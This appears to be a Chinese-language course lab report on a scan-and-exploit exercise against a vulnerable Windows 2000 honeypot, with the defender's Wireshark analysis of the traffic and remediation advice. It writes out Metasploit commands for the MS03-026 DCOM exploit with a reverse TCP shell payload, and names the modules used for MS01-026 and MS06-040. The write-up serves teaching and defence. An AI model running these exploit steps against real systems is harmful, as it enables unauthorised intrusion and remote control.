在本次攻防實(shí)踐中，攻擊方使用Nessus掃描軟件發(fā)現(xiàn)到目標(biāo)主機(jī)的特定網(wǎng)絡(luò)服務(wù)漏洞，并使用Metasploit軟件發(fā)起攻擊;防御方架設(shè)蜜罐， 并使用WireShark軟件捕獲并分析針對(duì)蜜罐主機(jī)的掃描和攻擊流量。以下給出攻防實(shí)踐報(bào)告，分實(shí)驗(yàn)環(huán)境、掃描過(guò)程、攻擊過(guò)程、漏洞修復(fù)與攻擊防范四個(gè) 部分分別介紹。

實(shí)驗(yàn)環(huán)境

在本次攻防實(shí)踐中，攻擊方和防御方各使用一臺(tái)宿主機(jī)。攻擊方使用宿主機(jī)中的一臺(tái)VMware虛擬機(jī)向防御方宿主機(jī)中的一臺(tái)VMware虛擬機(jī)發(fā)起探測(cè)和攻擊。

本次攻防實(shí)踐基于真實(shí)網(wǎng)絡(luò)環(huán)境，網(wǎng)絡(luò)拓?fù)淙缦聢D所示，攻擊方宿主機(jī)位于紫荊公寓，IP地址為59.66.207.31。其中的VMware虛擬機(jī)使 用課程FTP上提供的WinXP Attacker鏡像，并使用橋接方式與宿主機(jī)連接，其IP地址為59.66.207.91。防御方位于FIT大樓，IP地址為 166.111.132.216。其中的VMware虛擬機(jī)使用課程FTP上提供的Win2KS Metasploitable鏡像，并使用橋接方式與宿主機(jī)連接，其IP地址為166.111.132.232。

圖1 實(shí)驗(yàn)環(huán)境拓?fù)?/p>

WinXP Attacker使用Nessum軟件掃描Win2KS Metasploitable，在獲得漏洞后，在Metasploit攻擊框架中尋找到相應(yīng)漏洞的攻擊模塊發(fā)動(dòng)攻擊。防御方在宿主機(jī)上安裝有 WireShark軟件，由于所有去往Win2KS Metasploitable的流量都經(jīng)過(guò)防御方宿主機(jī)的物理網(wǎng)卡，所以可以使用宿主機(jī)上的WireShark軟件監(jiān)聽(tīng)到去往Win2KS Metasploitable的流量?？梢哉J(rèn)為Win2KS Metasploitable是防御方設(shè)置的蜜罐，而防御方本身使用WireShark作為一個(gè)簡(jiǎn)單的蜜罐網(wǎng)關(guān)，一旦WinXP Attacker對(duì)Win2KS Metasploitable進(jìn)行掃描或攻擊，防御方宿主機(jī)就能夠捕獲攻擊流量并進(jìn)行分析。

掃描過(guò)程

攻擊方使用WinXP Attacker中的Nessus掃描軟件對(duì)防御方網(wǎng)段進(jìn)行掃描，并發(fā)現(xiàn)了蜜罐主機(jī)的存在。Nessus軟件除了掃描對(duì)端主機(jī)開(kāi)放的端口和服務(wù)外，還可以選擇大量的插件，來(lái)實(shí)現(xiàn)對(duì)操作系統(tǒng)或軟件所提供的網(wǎng)絡(luò)服務(wù)中漏洞的掃描。

攻擊方首先使用默認(rèn)的配置對(duì)蜜罐進(jìn)行掃描，并獲得了掃描結(jié)果報(bào)告。圖2顯示的是掃描結(jié)果的概要，我們可以看出整個(gè)掃描時(shí)間持續(xù)了大約3分鐘，被掃描 主機(jī)開(kāi)放了69各端口，并存在大量的不安全因素。Nessus將其按危險(xiǎn)程度分為High、Medium和Low三類(lèi)，可以發(fā)現(xiàn)該蜜罐主機(jī)有30個(gè)極其危 險(xiǎn)的安全漏洞存在。另外還能獲得被掃描主機(jī)的操作系統(tǒng)、域名、本地賬戶(hù)口令相關(guān)的一些信息。

圖2 默認(rèn)配置的掃描結(jié)果

分類(lèi)為High的漏洞大部分都有MS安全漏洞編號(hào)，包 括：MS01-026，MS01-044，MS02-045，MS03-026，MS03-039，MS03-043，MS04-007，MS04-011，MS04-012，MS04-022，MS04-035，MS04-036，MS05-027，MS05-039，MS05-043，MS05-047，MS05-051，MS06-018，MS06-035，MS06-040，MS07-065，MS08-065，MS09-001，MS09-039，MS10-025。

為了簡(jiǎn)化實(shí)驗(yàn)過(guò)程，本次攻防實(shí)踐中只針對(duì)windows所提供的網(wǎng)絡(luò)服務(wù)中的一個(gè)漏洞MS03-026進(jìn)行。如圖3所示，這是微軟2003年公布 的一個(gè)漏洞，可以利用遠(yuǎn)程過(guò)程調(diào)用(Remote Procedure Call，RPC)的接口(具體位于RemoteActivation()函數(shù))進(jìn)行緩沖區(qū)溢出攻擊。

圖3 掃描結(jié)果中顯示的MS03-026漏洞

我們?cè)贜essus軟件中配置插件，使其只針對(duì)特定的漏洞進(jìn)行掃描。如圖4所示，我們?cè)贜essus插件列表中找到windows: Microsoft Bulletins，即微軟公布的漏洞列表。進(jìn)入該列表中我們就能夠選定MS03-026。

圖4 針對(duì)MS03-026漏洞的掃描軟件配置

之后攻擊方對(duì)蜜罐主機(jī)發(fā)起掃描，在掃描結(jié)果中顯示蜜罐主機(jī)存在MS03-026漏洞，如圖5所示。

圖5 Nessus掃描結(jié)果中顯示的MS03-026漏洞

在這次掃描過(guò)程中，防御方宿主機(jī)開(kāi)啟了WireShark，并記錄下了掃描的過(guò)程。該過(guò)程分為兩個(gè)部分，分別是端口掃描，和針對(duì)MS03-026 漏洞的掃描。在端口掃描部分，WireShark顯示出大量從59.66.207.91(即WinXP Attacker)發(fā)往166.111.132.232即(Win2KS Metasploitable)各個(gè)端口的[SYN]報(bào)文，同時(shí)能夠發(fā)現(xiàn)Win2KS Metasploitable的回應(yīng)[SYN, ACK]或[RST, ACK]報(bào)文。

在MS03-026漏洞掃描部分，WinXP Attacker向Win2KS Metasploitable的135、139和445等端口發(fā)送了大量request文。

攻擊過(guò)程

攻擊方使用WinXP Attacker中的Metasploit軟件發(fā)起攻擊。Metasploit的配置過(guò)程如圖6所示，首先選擇針對(duì)MS03-026的漏洞攻擊模塊，該模 塊屬于針對(duì)RPC的攻擊，使用命令exploit/windows/dcerpc/ms03_26_dcom;接下來(lái)選擇PAYLOAD，使用命令set PAYLOAD generic/shell_reverse_tcp;再分別設(shè)置本地主機(jī)和遠(yuǎn)程主機(jī)，使用命令set LHOST 59.66.207.91和set RHOST 166.111.132.232。最后使用命令exploit發(fā)起攻擊并獲得了遠(yuǎn)程主機(jī)，即Win2KS Metasploitable的控制權(quán)。

圖6 Metasploit配置過(guò)程

在這次攻擊過(guò)程中，防御方宿主機(jī)仍然開(kāi)啟WireShark，并記錄下了攻擊的過(guò)程。WireShark顯示攻擊來(lái)自59.66.207.91(即 WinXP Attacker)，目標(biāo)為166.111.132.232即(Win2KS Metasploitable)，而整個(gè)攻擊過(guò)程雙方來(lái)回的報(bào)文只有20個(gè)，我們?cè)诖嗽敿?xì)分析一下這個(gè)過(guò)程。

l 前5個(gè)數(shù)據(jù)包：WinXP Attacker使用7937端口向Win2KS Metasploitable的135端口發(fā)起TCP連接和bind請(qǐng)求;

l 第6-8個(gè)數(shù)據(jù)包：應(yīng)該就是WinXP Attacker使用已經(jīng)建立的連接向Win2KS Metasploitable發(fā)送shellcode，通過(guò)后者的漏洞造成緩沖區(qū)溢出，在其4444端口上綁定了一個(gè)shell;

l 第9-12個(gè)數(shù)據(jù)包：Win2KS Metasploitable使用4444端口向WinXP Attacker的1049端口發(fā)起反向TCP連接;

l 第13-16個(gè)數(shù)據(jù)包：雙方拆除了基于135端口建立的TCP連接;

l 第17-20個(gè)數(shù)據(jù)包：Win2KS Metasploitable向WinXP Attacker發(fā)送[PSH ACK]數(shù)據(jù)包，在本地執(zhí)行cmd.exe并通過(guò)之前的連接回傳，此時(shí)攻擊者已能任意訪問(wèn)遠(yuǎn)程資源。

另外我們還針對(duì)Win2KS Metasploitable的其他幾個(gè)漏洞發(fā)起了攻擊，成功的包括MS01-026和MS06-040，分別使用exploit/windows /iis/ms01-026和exploit/windows/smb/ms06-040攻擊模塊。以下是Metasploit控制臺(tái)攻擊過(guò)程截圖：

圖7 針對(duì)MS01-026和MS06-040的攻擊

漏洞修復(fù)與攻擊防范

一旦了解了攻擊者所利用的漏洞，首先應(yīng)尋找修復(fù)的方法。微軟提供了安全漏洞公告與補(bǔ)丁下載的網(wǎng)站http://www.microsoft.com/technet/security/current.aspx。下圖是微軟對(duì)本次實(shí)驗(yàn)利用的MS03-026漏洞的描述。

圖8 微軟發(fā)布的MS03-26漏洞公告及補(bǔ)丁下載頁(yè)面

對(duì)于防御Windows網(wǎng)絡(luò)服務(wù)遠(yuǎn)程滲透攻擊的方法，首要的是盡快為操作系統(tǒng)與軟件更新安全補(bǔ)丁，同時(shí)可以利用漏洞掃描軟件來(lái)發(fā)現(xiàn)漏洞的存在并及時(shí) 修補(bǔ)。另外，攻擊者會(huì)利用一些開(kāi)放的端口實(shí)施漏洞掃描(如掃描MS03-026漏洞時(shí)訪問(wèn)的135,139和445等端口)，因此開(kāi)啟防火墻禁止相關(guān)端口 的訪問(wèn)也將是防御遠(yuǎn)程攻擊的有效方式